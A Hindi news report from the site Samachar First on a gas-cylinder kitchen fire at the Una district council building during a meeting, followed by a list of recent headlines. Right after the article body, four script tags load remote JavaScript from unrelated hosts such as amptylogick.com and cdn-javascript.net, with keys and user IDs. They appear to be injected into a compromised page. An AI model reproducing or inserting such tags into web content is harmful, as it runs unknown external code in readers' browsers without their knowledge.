ऊनाः जिला परिषद भवन के रसोई घर में भड़की आग

<p>जिला परिषद भवन ऊना के रसोई घर में सिलेंडर में अचानक ही आग भड़क गई। हालांकि आग पर समय रहते ही आग पर काबू पा लिया, अन्यथा बड़ा हादसा हो सकता था। जानकारी के अनुसार जिला परिषद भवन ऊना में त्रिमासी बैठक चल रही थी। इसलिए रसोई घर के किचन में दोपहर के भोजन का प्रबंध किया जा रहा था। बताया जा रहा है कि इसी दौरान रसोई घर के किचन में घरेलू गैस सिलेंडर ने अचानक ही आग पकड़ ली। जिस पर वहां पर अफरा तफरी मच गई। बैठक में बैठे जिला परिषद के सदस्यों ने भी तुरंत मदद के लिए पहुंचे ।</p>

<p>आग लगने पर अग्रिशमन केंद्र ऊना को भी सूचना दी गई। वह भी मौके पर पहुंचे और अग्रिशमन यंत्रों की मदद से समय रहते आग पर काबू पा लिया गया। अन्यथा एक बड़ा हादसा हो सकता था। यह भी बताया जा रहा है कि रसोई घर में घरेलू गैस सिलेंडर का इस्तेमाल हो रहा था। सरकारी कार्यक्रम में घरेलू गैस सिलेंडर के इस्तेमाल होने पर कई तरह के सवालिया निशान भी खड़े हो रहे हैं। आग लगने के पीछे क्या कारण रहे हैं, इसका भी पता लगाया जा रहा है। वहीं, कार्यकारी जिला उपायुक्त अरिंदम चौधरी ने मामले की जांच के आदेश जारी किए हैं। अग्रिशमन केंद्र ऊना के प्रभारी नितिन ने बताया कि आग लगने की सूचना मिलने पर तुरंत अग्रिशमन केंद्र से टीम को भेजा गया और समय रहते आग पर काबू पा लिया गया। उधर, एसपी दिवाकर शर्मा ने कहा कि पुलिस मामले की जांच कर रही है। मौके पर मौजूद लोगों के ब्यान दर्ज किए जा रहे हैं।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1576571891074″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

फोरलेन निर्माण कार्य से लोगों नहीं हों प्रभावित: पठानिया

धर्मशाला : उपमुख्य सचेतक केवल सिंह पठानिया ने कहा कि   फोरलेन कार्य के चलते…

4 hours ago

नई खेल नीति खिलाड़ियों को करेगी प्रोत्साहित: केवल पठानिया

धर्मशाला : शाहपुर विधानसभा क्षेत्र  के अंतर्गत रैत के 42 मील स्थित ओम पैलेस में…

4 hours ago

राज्यपाल शिव प्रताप शुक्ल ने कुल्लू के लिए भेजी राहत सामग्री

राज्यपाल शिव प्रताप शुक्ल ने राज भवन से कुल्लू जिला के लिए राहत सामग्री के…

5 hours ago

मछुआरा संघ के प्रतिनिधिमंडल ने मुख्यमंत्री से की मुलाकात

देहरा : मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू से शुक्रवार को पौंग बांध मछुआरा संघ के…

5 hours ago

मिशन शक्ति के तहत आयोजित किया जागरूकता कार्यक्रम

 धर्मशाला : कांगड़ा जिला में मिशन शक्ति के अंतर्गत प्रागपुर ब्लाक में 100 दिनों का…

5 hours ago

‘कैच द रेन’ अभियान के तहत 15 जुलाई तक सभी विभागों से मांगी रिपोर्ट

धर्मशाला : अतिरिक्त उपायुक्त सौरभ जस्सल ने कहा कि कैच द रेन अभियान के तहत…

5 hours ago